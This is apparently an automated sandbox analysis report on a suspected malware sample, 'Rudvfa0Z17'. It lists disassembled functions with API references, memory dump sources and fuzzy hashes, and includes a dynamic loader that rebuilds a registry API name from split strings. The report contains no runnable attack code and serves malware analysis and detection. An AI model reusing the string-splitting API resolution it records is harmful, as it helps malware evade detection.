                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcollatestd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: 4s$bad cast
                                • API String ID: 2346505839-1685677060
                                • Opcode ID: 3c3678b4abce1eba8989befd7aa947ca3ac5d11e41ebefd34c2d17f5ae732061
                                • Instruction ID: b33bef0a32c6fd70ad8b26ba0ab6a364ec30e67ea7d28104bc76a1762adaa616
                                • Opcode Fuzzy Hash: 3c3678b4abce1eba8989befd7aa947ca3ac5d11e41ebefd34c2d17f5ae732061
                                • Instruction Fuzzy Hash: 7101C0319002199BCB05EBB1D852AFD773BAF41720F24091DF9107B2D1CF78AA058BA9
                                Function 00661F8E Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00661F95
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00661F9F
                                • int.LIBCPMT ref: 00661FB6
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • moneypunct.LIBCPMT ref: 00661FD9
                                • std::bad_exception::bad_exception.LIBCMT ref: 00661FED
                                • __CxxThrowException@8.LIBCMT ref: 00661FFB
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00662011
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: @s$bad cast
                                • API String ID: 2090539961-2545571930
                                • Opcode ID: 647d6d88b47cbe7f633e968144cf04d1b336e310802a83c86678a4079ded0725
                                • Instruction ID: b2571e3727f6e051780bf42adb46a433ff3783e34a134af3d70ae272ba740d83
                                • Opcode Fuzzy Hash: 647d6d88b47cbe7f633e968144cf04d1b336e310802a83c86678a4079ded0725
                                • Instruction Fuzzy Hash: 57016D3190021A9BCB05EBB0D857AFE7727AF40721F24051DF9107B2D1DF78AA459799
                                Function 0041D290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0041D2BD
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0041D2E0
                                • std::bad_exception::bad_exception.LIBCMT ref: 0041D364
                                • __CxxThrowException@8.LIBCMT ref: 0041D372
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0041D385
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0041D39F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: F%@$bad cast
                                • API String ID: 2427920155-3434137552
                                • Opcode ID: aea368b7cbbc8cd1210328c9585d07067fb43aaa5f9bfa8f5e18812f550e7f26
                                • Instruction ID: 62cc12de31fcd688fc302111fd7803b93f00061f61340484f7a59fcb2b0fb051
                                • Opcode Fuzzy Hash: aea368b7cbbc8cd1210328c9585d07067fb43aaa5f9bfa8f5e18812f550e7f26
                                • Instruction Fuzzy Hash: 3231B1B1D002089BDB14DF54D982BEE77B4FB44321F14865EED22A72D1DB38AD44CB9A
                                Function 00405DF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00405E1D
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00405E40
                                • std::bad_exception::bad_exception.LIBCMT ref: 00405EC4
                                • __CxxThrowException@8.LIBCMT ref: 00405ED2
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00405EE5
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00405EFF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: F%@$bad cast
                                • API String ID: 2427920155-3434137552
                                • Opcode ID: 65536f8fc2f2bb19963cdfc39213ecb4cff8ade62ad2126ec5798af45b06981d
                                • Instruction ID: 9ae9f6b10cc2249ea72c0d0f87f2ee015f6502937317e6e6103ba5e4811ceb80
                                • Opcode Fuzzy Hash: 65536f8fc2f2bb19963cdfc39213ecb4cff8ade62ad2126ec5798af45b06981d
                                • Instruction Fuzzy Hash: DE31BF319006049FDB14EF54D882BAFB7A4FB04321F14866EE956A72D1DB38AE04CFD9
                                Function 0041DE30 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0041DE5D
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0041DE80
                                • std::bad_exception::bad_exception.LIBCMT ref: 0041DF04
                                • __CxxThrowException@8.LIBCMT ref: 0041DF12
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0041DF25
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0041DF3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: F%@$bad cast
                                • API String ID: 2427920155-3434137552
                                • Opcode ID: 6d953ad7ef0ebc40da00cc9186620699c379573fb2ae198b389556fa4f0b942f
                                • Instruction ID: 4d04c4e78dbc3ef4fec41ac34a4624523ae78f37153f495f19a8c8bf6698b95a
                                • Opcode Fuzzy Hash: 6d953ad7ef0ebc40da00cc9186620699c379573fb2ae198b389556fa4f0b942f
                                • Instruction Fuzzy Hash: 0731E2B1D006049FDB14DF54D882BEE7774FB14362F14865EE912AB2D1DB38AE44CB89
                                Function 026D2F1A Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 72libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(?,?), ref: 026D2F72
                                • GetProcAddress.KERNEL32(00000000), ref: 026D2F79
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: .dll$ADVA$PI32$RegG$etVa$lueA
                                • API String ID: 2574300362-1882813265
                                • Opcode ID: 992b54e621e4298502306d985922b6535659073c6f5a5d5f614955d1362188d0
                                • Instruction ID: e0ffaba150366fb0a267236ddf18c022ae83c3c7e279415802c7f2dabdcfa397
                                • Opcode Fuzzy Hash: 992b54e621e4298502306d985922b6535659073c6f5a5d5f614955d1362188d0
                                • Instruction Fuzzy Hash: 492138B1D0125DAFDB10CFA8C999AEEBBBCEF08744F10446AE911B7241D7709A45CB74
                                Function 10002F16 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 72libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(?,?), ref: 10002F6E
                                • GetProcAddress.KERNEL32(00000000), ref: 10002F75
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: .dll$ADVA$PI32$RegG$etVa$lueA
                                • API String ID: 2574300362-1882813265
                                • Opcode ID: 992b54e621e4298502306d985922b6535659073c6f5a5d5f614955d1362188d0
                                • Instruction ID: e549d43aef67382777316db0078eb220cca058ffe1a515555f97d50673392cdb
                                • Opcode Fuzzy Hash: 992b54e621e4298502306d985922b6535659073c6f5a5d5f614955d1362188d0
                                • Instruction Fuzzy Hash: 3A211D7190125EAFEB00DFA4D985AEEBBBCEF09284F204069E501B7241D7709E45CB74
                                Function 00402FA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68COMMON
                                Download Yara Rule
                                APIs
                                • __CxxThrowException@8.LIBCMT ref: 00402FC6
                                  • Part of subcall function 00641C89: RaiseException.KERNEL32(00401FC3,?,3F7259E2,006FC518,00401FC3,?,0071C220,?,3F7259E2), ref: 00641CCB
                                • std::exception::exception.LIBCMT ref: 00402FED
                                • __CxxThrowException@8.LIBCMT ref: 0040300C
                                • std::exception::exception.LIBCMT ref: 0040302E
                                • __CxxThrowException@8.LIBCMT ref: 0040304D
                                • std::exception::exception.LIBCMT ref: 0040306A
                                • __CxxThrowException@8.LIBCMT ref: 00403089
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
                                • String ID: ios_base::badbit set
                                • API String ID: 4237746311-3882152299
                                • Opcode ID: d055ba080e46d3afb165dd0b32a8c3fd06f509e51361a16332e909f32d278550
                                • Instruction ID: bcf4659f536c84b5fb445d044c3d8a3bab5cc66639cc09fcead38813998a4a59
                                • Opcode Fuzzy Hash: d055ba080e46d3afb165dd0b32a8c3fd06f509e51361a16332e909f32d278550
                                • Instruction Fuzzy Hash: CD2192B10183055FC744EF98C9427ABBBEABFC8714F044A1EF59456281DB749648CB6B
                                Function 00550749 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON
                                Download Yara Rule
                                APIs
                                • GetStockObject.GDI32(00000011), ref: 00550771
                                • GetStockObject.GDI32(0000000D), ref: 00550779
                                • GetObjectW.GDI32(00000000,0000005C,?), ref: 00550786
                                • GetDC.USER32(00000000), ref: 00550795
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005507A9
                                • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 005507B5
                                • ReleaseDC.USER32(00000000,00000000), ref: 005507C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Object$Stock$CapsDeviceRelease
                                • String ID: System
                                • API String ID: 46613423-3470857405
                                • Opcode ID: 2c0b42b9be9e15ba651d7f2b0f561991efcd70bd886e5bb228b44a5ab96f9394
                                • Instruction ID: 54e1fffa9a0db50b54aa715619ed74f5e32c55810bb815965b60e74fcc4cade9
                                • Opcode Fuzzy Hash: 2c0b42b9be9e15ba651d7f2b0f561991efcd70bd886e5bb228b44a5ab96f9394
                                • Instruction Fuzzy Hash: 5E116071A11319ABEB209BA1DD59FAE7BBAFB58742F001116FA05AB1C0DF709D05CB60
                                Function 0066987A Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00669881
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0066988B
                                • int.LIBCPMT ref: 006698A2
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • collate.LIBCPMT ref: 006698C5
                                • std::bad_exception::bad_exception.LIBCMT ref: 006698D9
                                • __CxxThrowException@8.LIBCMT ref: 006698E7
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 006698FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcollatestd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 2346505839-3145022300
                                • Opcode ID: c7dcdce554f025be4bbdeb8c96ad32506d85fe65842861ed2f3df3756edf2ac8
                                • Instruction ID: 76b82a961214e7fcd13cba6bad4578a43e34f2834f173bca1e77d5c1bd03d7df
                                • Opcode Fuzzy Hash: c7dcdce554f025be4bbdeb8c96ad32506d85fe65842861ed2f3df3756edf2ac8
                                • Instruction Fuzzy Hash: 3B018B319002099BCB45EBB0D846AFE762AAF40721F280A1DE9107B2D1CF78AA059799
                                Function 006610DC Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 006610E3
                                • std::_Lockit::_Lockit.LIBCPMT ref: 006610ED
                                • int.LIBCPMT ref: 00661104
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • messages.LIBCPMT ref: 00661127
                                • std::bad_exception::bad_exception.LIBCMT ref: 0066113B
                                • __CxxThrowException@8.LIBCMT ref: 00661149
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066115F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmessagesstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 2525416601-3145022300
                                • Opcode ID: 5267a9957ff807e0d8048dcfdb4c8a696385948f6b01c38c1e6100ef9e554526
                                • Instruction ID: e31313b47818e4fa723cebde3304911d0e6d9bcfcc32675d63fa63f32350ad4b
                                • Opcode Fuzzy Hash: 5267a9957ff807e0d8048dcfdb4c8a696385948f6b01c38c1e6100ef9e554526
                                • Instruction Fuzzy Hash: 1C01A13190020997CB45EBB4D847AFEB737AF41720F14052DF6107B2D1DF789A458798
                                Function 00661179 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00661180
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0066118A
                                • int.LIBCPMT ref: 006611A1
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • codecvt.LIBCPMT ref: 006611C4
                                • std::bad_exception::bad_exception.LIBCMT ref: 006611D8
                                • __CxxThrowException@8.LIBCMT ref: 006611E6
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 006611FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 1676052248-3145022300
                                • Opcode ID: 144dfffc6cf9ecc199da783fef5036167a9ee660f9e02e39d3c36e6819f7d871
                                • Instruction ID: dcf8e966f7f7ec9daa7d07fac8d87b5ef1b3e8221936871c71bbf339b4645cb8
                                • Opcode Fuzzy Hash: 144dfffc6cf9ecc199da783fef5036167a9ee660f9e02e39d3c36e6819f7d871
                                • Instruction Fuzzy Hash: 2201A13190020597CB05EBB0D853AFEB737AF41721F14061DF6107B2D1CF789A458799
                                Function 0066CA78 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 0066CA7F
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0066CA89
                                • int.LIBCPMT ref: 0066CAA0
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • moneypunct.LIBCPMT ref: 0066CAC3
                                • std::bad_exception::bad_exception.LIBCMT ref: 0066CAD7
                                • __CxxThrowException@8.LIBCMT ref: 0066CAE5
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066CAFB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 2090539961-3145022300
                                • Opcode ID: 67f399d63503d9145d7d7f64ca0e814bbd7a10c470f64cd645c21b791ffc8b76
                                • Instruction ID: ec4f1ccdefa5ac39cf28df0df9828a9e6186cc863a4c66b3ea371a43a4c459d7
                                • Opcode Fuzzy Hash: 67f399d63503d9145d7d7f64ca0e814bbd7a10c470f64cd645c21b791ffc8b76
                                • Instruction Fuzzy Hash: 92018B31A006199BCB05EBA0C853AFE7737AB40725F14051EF9116B2D1DF78AA058799
                                Function 00660A1D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00660A24
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00660A2E
                                • int.LIBCPMT ref: 00660A45
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • ctype.LIBCPMT ref: 00660A68
                                • std::bad_exception::bad_exception.LIBCMT ref: 00660A7C
                                • __CxxThrowException@8.LIBCMT ref: 00660A8A
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660AA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 3532015510-3145022300
                                • Opcode ID: a4a9e4347d902a243108e4174a03dfc018b233ad6e86e47f514dc31253819b02
                                • Instruction ID: d35e4f58ef30ade2f85602cdb2ba920551ae3a08851aa5ef5a760c7967559598
                                • Opcode Fuzzy Hash: a4a9e4347d902a243108e4174a03dfc018b233ad6e86e47f514dc31253819b02
                                • Instruction Fuzzy Hash: E201C0319002199BDB05EBF4C842AFE7737AF40761F24062DF9107B2D2CF78AA058799
                                Function 0066C30E Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 0066C315
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0066C31F
                                • int.LIBCPMT ref: 0066C336
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • messages.LIBCPMT ref: 0066C359
                                • std::bad_exception::bad_exception.LIBCMT ref: 0066C36D
                                • __CxxThrowException@8.LIBCMT ref: 0066C37B
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066C391
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
